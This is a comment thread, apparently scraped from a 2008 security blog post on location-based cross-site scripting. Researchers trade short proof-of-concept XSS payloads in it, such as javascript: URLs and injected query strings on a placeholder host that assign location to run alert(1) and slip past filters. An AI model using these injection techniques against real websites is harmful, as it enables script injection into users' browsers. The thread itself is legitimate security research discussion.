Comments on: Location based XSS attacks http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/ Javascript blog with messed up syntax inside Thu, 26 Jan 2012 01:38:34 +0000 hourly 1 By: Gareth Heyes http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1384 Gareth Heyes Sun, 28 Dec 2008 12:30:58 +0000 http://www.thespanner.co.uk/?p=274#comment-1384 @ivan Look up dom based XSS and that should answer your question. @ivan

Look up dom based XSS and that should answer your question.

]]> By: Ivan http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1383 Ivan Sun, 28 Dec 2008 07:28:37 +0000 http://www.thespanner.co.uk/?p=274#comment-1383 Can anyone explain, in which way this in an xss-attack? Can anyone explain, in which way this in an xss-attack?

]]> By: Gareth Heyes http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1372 Gareth Heyes Mon, 01 Dec 2008 22:46:01 +0000 http://www.thespanner.co.uk/?p=274#comment-1372 Yeah nice ones there's other ways too but I thought I'd post the comment trick cause it's nice :) location='javascript:alert%25281%2529' Yeah nice ones there’s other ways too but I thought I’d post the comment trick cause it’s nice :)

location=’javascript:alert%25281%2529′

]]> By: Giorgio Maone http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1371 Giorgio Maone Mon, 01 Dec 2008 21:54:46 +0000 http://www.thespanner.co.uk/?p=274#comment-1371 BTW, why not the ever green http://someserver.com/somepage.php?param=“,location=name ? BTW, why not the ever green

http://someserver.com/somepage.php?param=“,location=name

?

]]> By: Giorgio Maone http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1370 Giorgio Maone Mon, 01 Dec 2008 21:51:40 +0000 http://www.thespanner.co.uk/?p=274#comment-1370 Ooops (damn SpamBam) http://someserver.com/somepage.php?param=“,location='javascript:'+location#%0aalert(1) Ooops (damn SpamBam)

http://someserver.com/somepage.php?param=“,location='javascript:'+location#alert(1)

]]> By: Giorgio Maone http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1369 Giorgio Maone Mon, 01 Dec 2008 21:50:43 +0000 http://www.thespanner.co.uk/?p=274#comment-1369 http://someserver.com/somepage.php?param=",location=location#%0aalert(1) http://someserver.com/somepage.php?param=“,location=location#%0aalert(1)

]]> By: David Lindsay http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/#comment-1368 David Lindsay Mon, 01 Dec 2008 18:08:54 +0000 http://www.thespanner.co.uk/?p=274#comment-1368 I really like the variation that avoids parenthesis. It's cleaner than the setter trick and works cross browsers too. I'll have to update my list of 2-stage injections to include it. I really like the variation that avoids parenthesis. It’s cleaner than the setter trick and works cross browsers too. I’ll have to update my list of 2-stage injections to include it.

]]>